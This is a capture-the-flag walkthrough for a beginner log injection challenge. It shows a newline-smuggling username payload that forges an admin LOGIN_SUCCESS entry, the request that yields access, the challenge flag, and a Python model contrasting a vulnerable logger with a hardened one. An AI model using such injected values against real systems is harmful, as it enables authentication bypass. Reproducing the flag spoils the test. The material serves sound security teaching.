HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

AuthLog — Log Injection

Logging & Monitoring · Log Injection
Difficulty
Beginner
Vuln class
Log Injection
Steps
3
// Objective
Forge a fake successful login entry in the audit log to bypass the authentication check.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1
Understand the log format
The app logs auth events in the format: [TIMESTAMP] LOGIN_SUCCESS user=USERNAME. The log is read by a monitoring script that grants access to users with recent LOGIN_SUCCESS entries.
2
Inject a forged log entry
The username field is logged without sanitisation. Inject a newline character followed by a forged success entry for admin.
Command / Input
username=guest%0A[2024-01-01 00:00:00] LOGIN_SUCCESS user=admin&password=wrong
The newline (sent URL-encoded as %0A in the form body; Burp or curl will encode it for you) terminates the real entry and starts a fresh line carrying the forged LOGIN_SUCCESS for admin. The forged timestamp has to fall inside whatever window the monitoring script treats as "recent", so use the current time rather than a stale one if the fixed date above is not accepted.
3
Trigger the monitoring check
Request the admin panel — the monitoring script reads the log, sees LOGIN_SUCCESS for admin, and grants access.
Command / Input
GET /admin/dashboard
Output
Access granted. HackrGG{l0g_1nj3ct10n_4ud1t_byp4ss}
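Added example, not code from the hackr.gg challenge itself: a minimal model of the whole AuthLog chain in Python. The log line format is the one given in step 1; the LOGIN_FAILURE event name, the 5-minute "recent" window, the fixed clock and the function names are assumptions made so the example runs offline. It shows the vulnerable logger beside a hardened one that escapes control characters, the monitoring check that the forged line fools, and the URL-encoded form body that a browser, Burp or curl actually sends.

```python
# Added example (not the challenge's own code). Assumptions: the LOGIN_FAILURE
# event name, a 5-minute "recent" window, a fixed clock and the function names.
import re
from datetime import datetime, timedelta
from urllib.parse import urlencode

# Log format from the walkthrough: [TIMESTAMP] LOGIN_SUCCESS user=USERNAME
LINE_RE = re.compile(
    r"^\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] (LOGIN_SUCCESS|LOGIN_FAILURE) user=(.*)$"
)

# Constructed payload: the walkthrough's username value with a real newline in it.
PAYLOAD = "guest\n[2024-01-01 00:00:00] LOGIN_SUCCESS user=admin"


def form_body(username: str, password: str = "wrong") -> str:
    """What curl/Burp put on the wire: the embedded newline is sent as %0A."""
    return urlencode({"username": username, "password": password})


def log_login_vulnerable(log: list, username: str, ok: bool, now: datetime) -> None:
    """Writes the username verbatim, so a newline inside it starts a second log line."""
    event = "LOGIN_SUCCESS" if ok else "LOGIN_FAILURE"   # LOGIN_FAILURE is assumed
    log.append(f"[{now:%Y-%m-%d %H:%M:%S}] {event} user={username}")


def log_login_hardened(log: list, username: str, ok: bool, now: datetime) -> None:
    """Same entry, but control characters are escaped so one event stays on one line."""
    safe = re.sub(r"[\x00-\x1f\x7f]", lambda m: f"\\x{ord(m.group()):02x}", username)
    event = "LOGIN_SUCCESS" if ok else "LOGIN_FAILURE"
    log.append(f"[{now:%Y-%m-%d %H:%M:%S}] {event} user={safe}")


def recent_successes(log_text: str, now: datetime, window: timedelta) -> set:
    """Stand-in for the monitoring script: users with a LOGIN_SUCCESS inside the window."""
    users = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # unparseable line, ignored like the real script would
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        if m.group(2) == "LOGIN_SUCCESS" and timedelta(0) <= now - ts <= window:
            users.add(m.group(3))
    return users


def run_attack(logger) -> set:
    """Submit the forged username with a wrong password, then ask the monitor who is logged in."""
    now = datetime(2024, 1, 1, 0, 0, 5)   # assumed clock: 5 s after the forged timestamp
    log = []
    logger(log, PAYLOAD, False, now)      # wrong password, so the real event is a failure
    return recent_successes("\n".join(log), now, timedelta(minutes=5))


if __name__ == "__main__":
    print(form_body(PAYLOAD))
    print("vulnerable:", run_attack(log_login_vulnerable))   # {'admin'}
    print("hardened:  ", run_attack(log_login_hardened))     # set()
```

With the vulnerable logger the single append produces two physical lines, and the monitor parses the attacker-controlled second one as a genuine admin success. With the hardened logger the same input stays on one line (the newline becomes the literal text \x0a inside the user= field), so the monitor sees only a LOGIN_FAILURE for a strange username. Escaping is the minimum fix; a structured format (JSON per line, or a syslog transport that frames messages) removes the ambiguity entirely, and an access decision should never be derived from a log file in the first place.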
// Flag
Flag value
HackrGG{l0g_1nj3ct10n_4ud1t_byp4ss}
Displayed on the admin dashboard after the forged log entry grants access.